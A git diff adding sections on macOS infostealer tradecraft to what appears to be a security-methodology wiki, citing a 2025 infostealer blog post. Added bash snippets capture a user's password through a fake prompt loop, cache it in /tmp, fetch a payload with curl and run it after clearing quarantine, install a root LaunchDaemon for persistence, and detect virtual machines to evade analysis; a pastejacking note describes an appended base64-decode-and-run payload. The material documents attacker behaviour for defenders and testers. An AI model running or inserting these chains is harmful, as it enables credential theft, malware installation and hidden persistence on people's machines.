diff --git a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md index c6678274b74..a52d4998927 100644 --- a/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md +++ b/src/generic-methodologies-and-resources/phishing-methodology/clipboard-hijacking.md @@ -10,6 +10,10 @@ Clipboard hijacking – also known as *pastejacking* – abuses the fact that us Because **no file is downloaded and no attachment is opened**, the technique bypasses most e-mail and web-content security controls that monitor attachments, macros or direct command execution. The attack is therefore popular in phishing campaigns delivering commodity malware families such as NetSupport RAT, Latrodectus loader or Lumma Stealer. +## Forced copy buttons and hidden payloads (macOS one-liners) + +Some macOS infostealers clone installer sites (e.g., Homebrew) and **force use of a “Copy” button** so users cannot highlight only the visible text. The clipboard entry contains the expected installer command plus an appended Base64 payload (e.g., `...; echo | base64 -d | sh`), so a single paste executes both while the UI hides the extra stage. + ## JavaScript Proof-of-Concept ```html @@ -203,5 +207,6 @@ homograph-attacks.md - [Pastejacking PoC – GitHub](https://github.com/dxa4481/Pastejacking) - [Check Point Research – Under the Pure Curtain: From RAT to Builder to Coder](https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/) - [The ClickFix Factory: First Exposure of IUAM ClickFix Generator](https://unit42.paloaltonetworks.com/clickfix-generator-first-of-its-kind/) +- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/) {{#include ../../banners/hacktricks-training.md}} \ No newline at end of file diff --git a/src/macos-hardening/macos-auto-start-locations.md b/src/macos-hardening/macos-auto-start-locations.md index 3b44e7ebbfa..c3efe30697f 100644 --- a/src/macos-hardening/macos-auto-start-locations.md +++ b/src/macos-hardening/macos-auto-start-locations.md @@ -88,6 +88,21 @@ List all the agents and daemons loaded by the current user: launchctl list ``` +#### Example malicious LaunchDaemon chain (password reuse) + +A recent macOS infostealer reused a **captured sudo password** to drop a user agent and a root LaunchDaemon: + +- Write the agent loop to `~/.agent` and make it executable. +- Generate a plist in `/tmp/starter` pointing to that agent. +- Reuse the stolen password with `sudo -S` to copy it into `/Library/LaunchDaemons/com.finder.helper.plist`, set `root:wheel`, and load it with `launchctl load`. +- Start the agent silently via `nohup ~/.agent >/dev/null 2>&1 &` to detach output. + +```bash +printf '%s\n' "$pw" | sudo -S cp /tmp/starter /Library/LaunchDaemons/com.finder.helper.plist +printf '%s\n' "$pw" | sudo -S chown root:wheel /Library/LaunchDaemons/com.finder.helper.plist +printf '%s\n' "$pw" | sudo -S launchctl load /Library/LaunchDaemons/com.finder.helper.plist +nohup "$HOME/.agent" >/dev/null 2>&1 & +``` > [!WARNING] > If a plist is owned by a user, even if it's in a daemon system wide folders, the **task will be executed as the user** and not as root. This can prevent some privilege escalation attacks. @@ -1793,6 +1808,10 @@ RunService () - [https://github.com/cedowens/Persistent-Swift](https://github.com/cedowens/Persistent-Swift) - [https://github.com/D00MFist/PersistentJXA](https://github.com/D00MFist/PersistentJXA) +## References + +- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/) + {{#include ../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md index c9309a9ad1f..cde16ede5cc 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-privilege-escalation.md @@ -209,6 +209,29 @@ killall Dock {{#endtab}} {{#endtabs}} +### Password prompt phishing + sudo reuse + +Malware frequently abuses user interaction to **capture a sudo-capable password** and reuse it programmatically. A common flow: + +1. Identify the logged in user with `whoami`. +2. **Loop password prompts** until `dscl . -authonly "$user" "$pw"` returns success. +3. Cache the credential (e.g., `/tmp/.pass`) and drive privileged actions with `sudo -S` (password over stdin). + +Example minimal chain: + +```bash +user=$(whoami) +while true; do + read -s -p "Password: " pw; echo + dscl . -authonly "$user" "$pw" && break +done +printf '%s\n' "$pw" > /tmp/.pass +curl -o /tmp/update https://example.com/update +printf '%s\n' "$pw" | sudo -S xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update +``` + +The stolen password can then be reused to **clear Gatekeeper quarantine with `xattr -c`**, copy LaunchDaemons or other privileged files, and run additional stages non-interactively. + ## TCC - Root Privilege Escalation ### CVE-2020-9771 - mount_apfs TCC bypass and privilege escalation @@ -247,6 +270,10 @@ This can be useful to escalate privileges: macos-files-folders-and-binaries/macos-sensitive-locations.md {{#endref}} +## References + +- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/) + {{#include ../../banners/hacktricks-training.md}} diff --git a/src/macos-hardening/macos-useful-commands.md b/src/macos-hardening/macos-useful-commands.md index c5cbf59fb0a..a0315e10839 100644 --- a/src/macos-hardening/macos-useful-commands.md +++ b/src/macos-hardening/macos-useful-commands.md @@ -117,6 +117,16 @@ dscacheutil -flushcache sudo killall -HUP mDNSResponder ``` +### Quick anti-analysis / virtualization check + +Some macOS stealers call `system_profiler` to detect VMs and **abort with a distinct exit code (e.g., 100)** to avoid sandbox detonation: + +```bash +if system_profiler SPHardwareDataType SPDisplaysDataType | grep -Eiq 'qemu|kvm|vmware|virtualbox'; then + exit 100 +fi +``` + ### Installed Software & Services Check for **suspicious** applications installed and **privileges** over the.installed resources: @@ -147,6 +157,10 @@ Without prompts
+## References + +- [2025, the year of the Infostealer](https://www.pentestpartners.com/security-blog/2025-the-year-of-the-infostealer/) + {{#include ../banners/hacktricks-training.md}}